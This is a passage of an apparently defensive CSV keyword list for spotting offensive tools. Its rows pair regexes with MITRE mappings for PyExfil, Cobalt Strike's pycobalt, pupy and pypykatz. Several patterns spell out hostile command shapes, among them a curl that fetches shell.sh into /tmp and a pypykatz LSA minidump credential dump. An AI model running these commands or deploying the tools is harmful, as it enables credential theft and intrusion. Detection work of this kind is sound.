T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - 
T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/dcsync/pycobalt","1","1","N/A","10","10","293","57","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z" "*pycobalt/aggressor*",".{0,1000}pycobalt\/aggressor.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/dcsync/pycobalt","1","1","N/A","10","10","293","57","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z" "*pycobalt_debug_on*",".{0,1000}pycobalt_debug_on.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - 
T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/dcsync/pycobalt","1","1","N/A","10","10","293","57","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z" "*pycobalt_path*",".{0,1000}pycobalt_path.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - 
Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/dcsync/pycobalt","1","1","N/A","10","10","293","57","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z" "*pycobalt_python*",".{0,1000}pycobalt_python.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/dcsync/pycobalt","1","1","N/A","10","10","293","57","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z" "*pycobalt_timeout*",".{0,1000}pycobalt_timeout.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - 
T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/dcsync/pycobalt","1","1","N/A","10","10","293","57","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z" "*pydictor*",".{0,1000}pydictor.{0,1000}","offensive_tool_keyword","pydictor","pydictor A powerful and useful hacker dictionary builder for a brute-force attack","T1110 - T1111 - T1210 - T1558.004","TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/LandGrey/pydictor","1","0","N/A","N/A","10","3170","626","2023-12-06T13:13:38Z","2016-08-17T08:16:56Z" "*pyexec -c *",".{0,1000}pyexec\s\-c\s.{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "*pyexec --file*",".{0,1000}pyexec\s\-\-file.{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. 
Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "*PyExec-main.*",".{0,1000}PyExec\-main\..{0,1000}","offensive_tool_keyword","PyExec","This is a very simple privilege escalation technique from admin to System. This is the same technique PSExec uses.","T1134 - T1055 - T1548.002","TA0004 - TA0005 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/OlivierLaflamme/PyExec","1","1","N/A","9","1","10","7","2019-09-11T13:56:04Z","2019-09-11T13:54:15Z" "*pyexfil.Comm.AllJoyn*",".{0,1000}pyexfil\.Comm\.AllJoyn.{0,1000}","offensive_tool_keyword","PyExfil","A Python Package for Data Exfiltration","T1041 - T1567 - T1027","TA0011 - TA0009 - TA0002","","","Data Exfiltration","https://github.com/ytisf/PyExfil","1","0","N/A","10","8","738","138","2023-02-17T03:12:36Z","2014-11-27T19:06:24Z" "*pyexfil.Comm.DNSoTLS.client*",".{0,1000}pyexfil\.Comm\.DNSoTLS\.client.{0,1000}","offensive_tool_keyword","PyExfil","A Python Package for Data Exfiltration","T1041 - T1567 - T1027","TA0011 - TA0009 - TA0002","","","Data Exfiltration","https://github.com/ytisf/PyExfil","1","0","N/A","10","8","738","138","2023-02-17T03:12:36Z","2014-11-27T19:06:24Z" "*pyexfil.Comm.DNSoTLS.server*",".{0,1000}pyexfil\.Comm\.DNSoTLS\.server.{0,1000}","offensive_tool_keyword","PyExfil","A Python Package for Data Exfiltration","T1041 - T1567 - T1027","TA0011 - TA0009 - TA0002","","","Data 
Exfiltration","https://github.com/ytisf/PyExfil","1","0","N/A","10","8","738","138","2023-02-17T03:12:36Z","2014-11-27T19:06:24Z" "*pyexfil.Comm.GQUIC*",".{0,1000}pyexfil\.Comm\.GQUIC.{0,1000}","offensive_tool_keyword","PyExfil","A Python Package for Data Exfiltration","T1041 - T1567 - T1027","TA0011 - TA0009 - TA0002","","","Data Exfiltration","https://github.com/ytisf/PyExfil","1","0","N/A","10","8","738","138","2023-02-17T03:12:36Z","2014-11-27T19:06:24Z" "*pyexfil.Comm.jetdirect.communicator*",".{0,1000}pyexfil\.Comm\.jetdirect\.communicator.{0,1000}","offensive_tool_keyword","PyExfil","A Python Package for Data Exfiltration","T1041 - T1567 - T1027","TA0011 - TA0009 - TA0002","","","Data Exfiltration","https://github.com/ytisf/PyExfil","1","0","N/A","10","8","738","138","2023-02-17T03:12:36Z","2014-11-27T19:06:24Z" "*pyexfil.Comm.MDNS*",".{0,1000}pyexfil\.Comm\.MDNS.{0,1000}","offensive_tool_keyword","PyExfil","A Python Package for Data Exfiltration","T1041 - T1567 - T1027","TA0011 - TA0009 - TA0002","","","Data Exfiltration","https://github.com/ytisf/PyExfil","1","0","N/A","10","8","738","138","2023-02-17T03:12:36Z","2014-11-27T19:06:24Z" "*pyexfil.Comm.NTP_Body.client*",".{0,1000}pyexfil\.Comm\.NTP_Body\.client.{0,1000}","offensive_tool_keyword","PyExfil","A Python Package for Data Exfiltration","T1041 - T1567 - T1027","TA0011 - TA0009 - TA0002","","","Data Exfiltration","https://github.com/ytisf/PyExfil","1","0","N/A","10","8","738","138","2023-02-17T03:12:36Z","2014-11-27T19:06:24Z" "*pyexfil.Comm.NTP_Body.server*",".{0,1000}pyexfil\.Comm\.NTP_Body\.server.{0,1000}","offensive_tool_keyword","PyExfil","A Python Package for Data Exfiltration","T1041 - T1567 - T1027","TA0011 - TA0009 - TA0002","","","Data Exfiltration","https://github.com/ytisf/PyExfil","1","0","N/A","10","8","738","138","2023-02-17T03:12:36Z","2014-11-27T19:06:24Z" "*pyexfil.HTTPS.https_client*",".{0,1000}pyexfil\.HTTPS\.https_client.{0,1000}","offensive_tool_keyword","PyExfil","A Python 
Package for Data Exfiltration","T1041 - T1567 - T1027","TA0011 - TA0009 - TA0002","","","Data Exfiltration","https://github.com/ytisf/PyExfil","1","0","N/A","10","8","738","138","2023-02-17T03:12:36Z","2014-11-27T19:06:24Z" "*pyexfil.HTTPS.https_server*",".{0,1000}pyexfil\.HTTPS\.https_server.{0,1000}","offensive_tool_keyword","PyExfil","A Python Package for Data Exfiltration","T1041 - T1567 - T1027","TA0011 - TA0009 - TA0002","","","Data Exfiltration","https://github.com/ytisf/PyExfil","1","0","N/A","10","8","738","138","2023-02-17T03:12:36Z","2014-11-27T19:06:24Z" "*pyexfil.includes.data_generator*",".{0,1000}pyexfil\.includes\.data_generator.{0,1000}","offensive_tool_keyword","PyExfil","A Python Package for Data Exfiltration","T1041 - T1567 - T1027","TA0011 - TA0009 - TA0002","","","Data Exfiltration","https://github.com/ytisf/PyExfil","1","0","N/A","10","8","738","138","2023-02-17T03:12:36Z","2014-11-27T19:06:24Z" "*pyexfil.includes.encryption_wrappers*",".{0,1000}pyexfil\.includes\.encryption_wrappers.{0,1000}","offensive_tool_keyword","PyExfil","A Python Package for Data Exfiltration","T1041 - T1567 - T1027","TA0011 - TA0009 - TA0002","","","Data Exfiltration","https://github.com/ytisf/PyExfil","1","0","N/A","10","8","738","138","2023-02-17T03:12:36Z","2014-11-27T19:06:24Z" "*pyexfil.includes.exceptions*",".{0,1000}pyexfil\.includes\.exceptions.{0,1000}","offensive_tool_keyword","PyExfil","A Python Package for Data Exfiltration","T1041 - T1567 - T1027","TA0011 - TA0009 - TA0002","","","Data Exfiltration","https://github.com/ytisf/PyExfil","1","0","N/A","10","8","738","138","2023-02-17T03:12:36Z","2014-11-27T19:06:24Z" "*pyexfil.includes.general*",".{0,1000}pyexfil\.includes\.general.{0,1000}","offensive_tool_keyword","PyExfil","A Python Package for Data Exfiltration","T1041 - T1567 - T1027","TA0011 - TA0009 - TA0002","","","Data Exfiltration","https://github.com/ytisf/PyExfil","1","0","N/A","10","8","738","138","2023-02-17T03:12:36Z","2014-11-27T19:06:24Z" 
"*pyexfil.includes.image_manipulation*",".{0,1000}pyexfil\.includes\.image_manipulation.{0,1000}","offensive_tool_keyword","PyExfil","A Python Package for Data Exfiltration","T1041 - T1567 - T1027","TA0011 - TA0009 - TA0002","","","Data Exfiltration","https://github.com/ytisf/PyExfil","1","0","N/A","10","8","738","138","2023-02-17T03:12:36Z","2014-11-27T19:06:24Z" "*pyexfil.includes.prepare*",".{0,1000}pyexfil\.includes\.prepare.{0,1000}","offensive_tool_keyword","PyExfil","A Python Package for Data Exfiltration","T1041 - T1567 - T1027","TA0011 - TA0009 - TA0002","","","Data Exfiltration","https://github.com/ytisf/PyExfil","1","0","N/A","10","8","738","138","2023-02-17T03:12:36Z","2014-11-27T19:06:24Z" "*PyExfil.MoriRT.com*",".{0,1000}PyExfil\.MoriRT\.com.{0,1000}","offensive_tool_keyword","PyExfil","A Python Package for Data Exfiltration","T1041 - T1567 - T1027","TA0011 - TA0009 - TA0002","","","Data Exfiltration","https://github.com/ytisf/PyExfil","1","1","N/A","10","8","738","138","2023-02-17T03:12:36Z","2014-11-27T19:06:24Z" "*pyexfil.network*",".{0,1000}pyexfil\.network.{0,1000}","offensive_tool_keyword","PyExfil","A Python Package for Data Exfiltration","T1041 - T1567 - T1027","TA0011 - TA0009 - TA0002","","","Data Exfiltration","https://github.com/ytisf/PyExfil","1","0","N/A","10","8","738","138","2023-02-17T03:12:36Z","2014-11-27T19:06:24Z" "*pyexfil.network.DB_LSP.dblsp*",".{0,1000}pyexfil\.network\.DB_LSP\.dblsp.{0,1000}","offensive_tool_keyword","PyExfil","A Python Package for Data Exfiltration","T1041 - T1567 - T1027","TA0011 - TA0009 - TA0002","","","Data Exfiltration","https://github.com/ytisf/PyExfil","1","0","N/A","10","8","738","138","2023-02-17T03:12:36Z","2014-11-27T19:06:24Z" "*pyexfil.network.FTP.ftp_exfil*",".{0,1000}pyexfil\.network\.FTP\.ftp_exfil.{0,1000}","offensive_tool_keyword","PyExfil","A Python Package for Data Exfiltration","T1041 - T1567 - T1027","TA0011 - TA0009 - TA0002","","","Data 
Exfiltration","https://github.com/ytisf/PyExfil","1","0","N/A","10","8","738","138","2023-02-17T03:12:36Z","2014-11-27T19:06:24Z" "*pyexfil.network.HTTP_Cookies.http_exfiltration*",".{0,1000}pyexfil\.network\.HTTP_Cookies\.http_exfiltration.{0,1000}","offensive_tool_keyword","PyExfil","A Python Package for Data Exfiltration","T1041 - T1567 - T1027","TA0011 - TA0009 - TA0002","","","Data Exfiltration","https://github.com/ytisf/PyExfil","1","0","N/A","10","8","738","138","2023-02-17T03:12:36Z","2014-11-27T19:06:24Z" "*pyexfil.network.HTTPResp.client*",".{0,1000}pyexfil\.network\.HTTPResp\.client.{0,1000}","offensive_tool_keyword","PyExfil","A Python Package for Data Exfiltration","T1041 - T1567 - T1027","TA0011 - TA0009 - TA0002","","","Data Exfiltration","https://github.com/ytisf/PyExfil","1","0","N/A","10","8","738","138","2023-02-17T03:12:36Z","2014-11-27T19:06:24Z" "*pyexfil.network.ICMP.icmp_exfiltration*",".{0,1000}pyexfil\.network\.ICMP\.icmp_exfiltration.{0,1000}","offensive_tool_keyword","PyExfil","A Python Package for Data Exfiltration","T1041 - T1567 - T1027","TA0011 - TA0009 - TA0002","","","Data Exfiltration","https://github.com/ytisf/PyExfil","1","0","N/A","10","8","738","138","2023-02-17T03:12:36Z","2014-11-27T19:06:24Z" "*pyexfil.network.SpoofIP.spoofIPs_client*",".{0,1000}pyexfil\.network\.SpoofIP\.spoofIPs_client.{0,1000}","offensive_tool_keyword","PyExfil","A Python Package for Data Exfiltration","T1041 - T1567 - T1027","TA0011 - TA0009 - TA0002","","","Data Exfiltration","https://github.com/ytisf/PyExfil","1","0","N/A","10","8","738","138","2023-02-17T03:12:36Z","2014-11-27T19:06:24Z" "*pyexfil.physical.qr.generator*",".{0,1000}pyexfil\.physical\.qr\.generator.{0,1000}","offensive_tool_keyword","PyExfil","A Python Package for Data Exfiltration","T1041 - T1567 - T1027","TA0011 - TA0009 - TA0002","","","Data Exfiltration","https://github.com/ytisf/PyExfil","1","0","N/A","10","8","738","138","2023-02-17T03:12:36Z","2014-11-27T19:06:24Z" 
"*pyexfil.physical.wifiPayload.client*",".{0,1000}pyexfil\.physical\.wifiPayload\.client.{0,1000}","offensive_tool_keyword","PyExfil","A Python Package for Data Exfiltration","T1041 - T1567 - T1027","TA0011 - TA0009 - TA0002","","","Data Exfiltration","https://github.com/ytisf/PyExfil","1","0","N/A","10","8","738","138","2023-02-17T03:12:36Z","2014-11-27T19:06:24Z" "*pyexfil.Stega.binoffset.binoffset*",".{0,1000}pyexfil\.Stega\.binoffset\.binoffset.{0,1000}","offensive_tool_keyword","PyExfil","A Python Package for Data Exfiltration","T1041 - T1567 - T1027","TA0011 - TA0009 - TA0002","","","Data Exfiltration","https://github.com/ytisf/PyExfil","1","0","N/A","10","8","738","138","2023-02-17T03:12:36Z","2014-11-27T19:06:24Z" "*PYEXFIL_DEFAULT_PASSWORD*",".{0,1000}PYEXFIL_DEFAULT_PASSWORD.{0,1000}","offensive_tool_keyword","PyExfil","A Python Package for Data Exfiltration","T1041 - T1567 - T1027","TA0011 - TA0009 - TA0002","","","Data Exfiltration","https://github.com/ytisf/PyExfil","1","0","N/A","10","8","738","138","2023-02-17T03:12:36Z","2014-11-27T19:06:24Z" "*pyExfil-latest.zip*",".{0,1000}pyExfil\-latest\.zip.{0,1000}","offensive_tool_keyword","PyExfil","A Python Package for Data Exfiltration","T1041 - T1567 - T1027","TA0011 - TA0009 - TA0002","","","Data Exfiltration","https://github.com/ytisf/PyExfil","1","1","N/A","10","8","738","138","2023-02-17T03:12:36Z","2014-11-27T19:06:24Z" "*PyExfil-master*",".{0,1000}PyExfil\-master.{0,1000}","offensive_tool_keyword","PyExfil","A Python Package for Data Exfiltration","T1041 - T1567 - T1027","TA0011 - TA0009 - TA0002","","","Data Exfiltration","https://github.com/ytisf/PyExfil","1","1","N/A","10","8","738","138","2023-02-17T03:12:36Z","2014-11-27T19:06:24Z" "*pygpoabuse * -hashes lm:* -gpo-id *",".{0,1000}pygpoabuse\s.{0,1000}\s\-hashes\slm\:.{0,1000}\s\-gpo\-id\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 
- T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*pygpoabuse.py*",".{0,1000}pygpoabuse\.py.{0,1000}","offensive_tool_keyword","pyGPOAbuse","python implementation of SharpGPOAbuse","T1566.001 - T1059.006 - T1112","TA0001 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/Hackndo/pyGPOAbuse","1","1","N/A","8","4","305","37","2024-02-18T19:23:57Z","2020-05-10T21:21:27Z" "*pyherion.py*",".{0,1000}pyherion\.py.{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1710","584","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z" "*pyhon3 poc.py * curl http://*/shell.sh -o /tmp/shell.sh*",".{0,1000}pyhon3\spoc\.py\s.{0,1000}\scurl\shttp\:\/\/.{0,1000}\/shell\.sh\s\-o\s\/tmp\/shell\.sh.{0,1000}","offensive_tool_keyword","POC","Automated PoC exploitation of CVE-2021-44521","T1548 - T1190","TA0006 - TA0008","N/A","N/A","Exploitation tools","https://github.com/QHpix/CVE-2021-44521","1","0","N/A","N/A","1","9","2","2022-02-24T12:04:40Z","2022-02-24T11:07:34Z" "*pyinstaller netexec.spec*",".{0,1000}pyinstaller\snetexec\.spec.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*pyLAPS.py --action get -d * -u * -p * --dc-ip 
*",".{0,1000}pyLAPS\.py\s\-\-action\sget\s\-d\s.{0,1000}\s\-u\s.{0,1000}\s\-p\s.{0,1000}\s\-\-dc\-ip\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*pyLAPS-main*",".{0,1000}pyLAPS\-main.{0,1000}","offensive_tool_keyword","pyLAPS","A simple way to read and write LAPS passwords from linux.","T1136.001 - T1112 - T1078.001","TA0002 - TA0004 - TA0005","N/A","N/A","Credential Access","https://github.com/p0dalirius/pyLAPS","1","1","N/A","9","1","60","11","2024-03-31T12:13:57Z","2021-10-05T18:35:21Z" "*pyMalleableC2*",".{0,1000}pyMalleableC2.{0,1000}","offensive_tool_keyword","cobaltstrike","Quick python utility I wrote to turn HTTP requests from burp suite into Cobalt Strike Malleable C2 profiles","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - 
menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/CodeXTF2/Burp2Malleable","1","1","N/A","10","10","339","32","2023-04-06T15:24:12Z","2022-08-14T18:05:39Z" "*pymultitor*",".{0,1000}pymultitor.{0,1000}","offensive_tool_keyword","pymultitor","Python Multi Threaded Tor Proxy. Did you ever want to be at two different places at the same time? When I asked myself this question. I actually started developing this solution in my mind. While performing penetration tests there are often problems caused by security devices that block the attacking IP","T1071.001 - T1071.004 - T1055.008","TA0002 - TA0003 - TA0008","N/A","N/A","Data Exfiltration","https://github.com/realgam3/pymultitor","1","0","N/A","N/A","6","558","111","2024-02-25T20:40:50Z","2013-09-28T15:55:49Z" "*pypykatz *",".{0,1000}pypykatz\s.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","1","N/A","N/A","10","2670","357","2024-04-05T20:43:37Z","2018-05-25T22:21:20Z" "*pypykatz lsa minidump *",".{0,1000}pypykatz\slsa\sminidump\s.{0,1000}","offensive_tool_keyword","CSExec","An alternative to *exec.py from impacket with some builtin tricks","T1059.001 - T1059.005 - T1071.001","TA0002","N/A","N/A","Lateral Movement","https://github.com/Metro-Holografix/CSExec.py","1","0","private github repo","10","N/A","N/A","N/A","N/A","N/A" "*pypykatz lsa minidump*",".{0,1000}pypykatz\slsa\sminidump.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. 
pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/skelsec/pypykatz","1","0","N/A","10","10","2670","357","2024-04-05T20:43:37Z","2018-05-25T22:21:20Z" "*pypykatz not installed*",".{0,1000}pypykatz\snot\sinstalled.{0,1000}","offensive_tool_keyword","link","link is a command and control framework written in rust","T1071 - T1094 - T1132 - T1008 - T1024","TA0011 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/postrequest/link","1","0","N/A","10","10","540","88","2021-08-18T11:53:55Z","2021-02-02T11:15:43Z" "*pypykatz.commons*",".{0,1000}pypykatz\.commons.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","10","2670","357","2024-04-05T20:43:37Z","2018-05-25T22:21:20Z" "*pypykatz.dpapi*",".{0,1000}pypykatz\.dpapi.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","10","2670","357","2024-04-05T20:43:37Z","2018-05-25T22:21:20Z" 